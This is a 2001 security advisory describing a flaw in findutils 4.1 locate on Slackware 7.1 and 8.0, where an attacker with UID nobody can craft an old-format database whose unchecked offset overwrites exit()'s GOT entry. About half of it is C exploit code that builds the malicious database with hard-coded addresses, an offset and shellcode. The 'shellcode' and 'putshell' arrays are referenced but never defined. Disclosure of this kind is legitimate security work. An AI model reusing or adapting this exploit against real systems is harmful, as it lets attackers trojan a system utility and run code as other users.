Security Vulnerability found in /usr/bin/locate (Exploit Code)
11 Aug. 2001
Summary
Slackware, and possibly other distributions, suffer from a security vulnerability that enables attackers to modify the locate database if they are able to obtain UID nobody.
This allows attackers to 'Trojan' the locate utility, having anyone who executes it unknowingly execute potentially malicious code.
Vulnerable systems:
findutils version 4.1
Slackware 7.1
Slackware 8.0
The attack works by taking advantage of the fact locate accepts old format databases. LOCATEDB_OLD_ESCAPE (char 30) is followed by an offset, stored in a signed integer, specifying how many characters to add to the current character pointer in the path. It does not perform any sanity checks of the input. This exploit tells it to move the pointer back a long way, back past the beginning of the string, all the way to the GOT address for exit() which then gets the address of the shell code added, and the program then runs out of database and executes our code. There might be a similar vulnerability in the new format.
int main(void)
{
int i;
int z0=0; int addr=0x0804a970;
int z1=0; int addr2=-626;
int z2=0; int addr3=addr+6;
printf("%s", &addr);
printf("%s", &addr3);
printf("%s",shellcode);
fflush(stdout);
for(i=46;i<256;i++) putchar('A');
printf("%s", putshell);
fflush(stdout);
putchar(0);
putchar(30);
printf("%s", &addr2);
printf("\x82\x83");
fflush(stdout);
}
